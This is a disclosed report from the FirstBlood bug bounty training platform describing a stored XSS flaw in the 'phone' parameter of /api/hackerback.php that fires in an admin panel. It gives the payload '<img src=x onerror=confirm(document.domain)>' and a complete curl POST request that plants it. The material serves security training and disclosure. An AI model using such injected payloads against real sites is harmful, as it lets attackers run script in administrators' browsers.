FirstBlood-#1020 — Stored XSS on drpanel
This issue was discovered on FirstBlood v3
On 2022-12-08, lumbridge7 Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello firstblood team!
Summary
The API endpoint that handles the request on https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/hackerback.html to join an event doesn't properly sanitizes the input on the phone parameter. While it is not possible to insert anything other than numbers through the GUI, an attacker can still manually craft the POST request using malicious JS code ad the phone value.
Steps to reproduce
- Make a POST request at 5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php with the payload
full_name=StoredXSS&phone=<img src=x onerror=confirm(document.domain)>&submit=Signup
- log in the drpanel
Curl request:
curl -X POST 'https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php' -H "Content-Type: application/x-www-form-urlencoded" -d "full_name=StoredXSS&phone=<img%20src=x%20onerror=confirm(document.domain)>&submit=Signup"
POC
P1 CRITICAL
Endpoint: /api/hackerback.php
Parameter: phone
Payload: <img src=x onerror=confirm(document.domain)>
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
Report Feedback
Creator & Administrator
Congratulations, you were the third researcher to discover this!